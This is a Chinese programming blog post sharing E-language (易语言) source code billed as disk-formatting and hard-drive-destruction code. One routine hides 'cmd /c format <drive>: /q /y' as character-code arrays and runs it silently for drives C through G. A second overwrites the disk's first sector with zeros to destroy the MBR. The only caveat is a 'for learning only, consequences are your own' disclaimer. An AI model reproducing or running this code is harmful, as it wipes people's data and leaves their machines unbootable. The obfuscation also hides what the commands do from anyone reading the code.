每天拿出一分钟来学习,你的生命会更加精彩。

易语言格盘+硬盘破坏源码(谨慎测试)

发布:洪雨2020-7-24 20:07分类: 编程相关 标签: 易语言 编程

.版本 2

.子程序 格式化硬盘, , , 注意,此功能仅提供学习而已.如用到违法方面的话后果自负.
.参数 磁盘, 文本型, , 写上需要格式化的盘,如C盘就写C D盘就写D E F G 一共只支持5个盘
.局部变量 盘符, 文本型

盘符 = 到小写 (磁盘)
.如果真 (盘符 = 到文本 ({ 99 }))
    运行 (到文本 ({ 99, 109, 100, 32, 47, 99, 32, 102, 111, 114, 109, 97, 116, 32, 99, 58, 32, 47, 113, 32, 47, 121 }), 假, 1)
.如果真结束
.如果真 (盘符 = 到文本 ({ 100 }))
    运行 (到文本 ({ 99, 109, 100, 32, 47, 99, 32, 102, 111, 114, 109, 97, 116, 32, 100, 58, 32, 47, 113, 32, 47, 121 }), 假, 1)
.如果真结束
.如果真 (盘符 = 到文本 ({ 101 }))
    运行 (到文本 ({ 99, 109, 100, 32, 47, 99, 32, 102, 111, 114, 109, 97, 116, 32, 101, 58, 32, 47, 113, 32, 47, 121 }), 假, 1)
.如果真结束
.如果真 (盘符 = 到文本 ({ 102 }))
    运行 (到文本 ({ 99, 109, 100, 32, 47, 99, 32, 102, 111, 114, 109, 97, 116, 32, 102, 58, 32, 47, 113, 32, 47, 121 }), 假, 1)
.如果真结束
.如果真 (盘符 = 到文本 ({ 103 }))
    运行 (到文本 ({ 99, 109, 100, 32, 47, 99, 32, 102, 111, 114, 109, 97, 116, 32, 103, 58, 32, 47, 113, 32, 47, 121 }), 假, 1)
.如果真结束


.子程序 物理硬盘_破坏MBR, , , 这个也可以随便乱玩.但后果自负
.局部变量 data, 字节集

data = 取空白字节集 (512)
_写硬盘扇区 (data, 0, 1)

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/3484 人参与

发表评论:

欢迎使用手机扫描访问本站,还可以关注微信哦~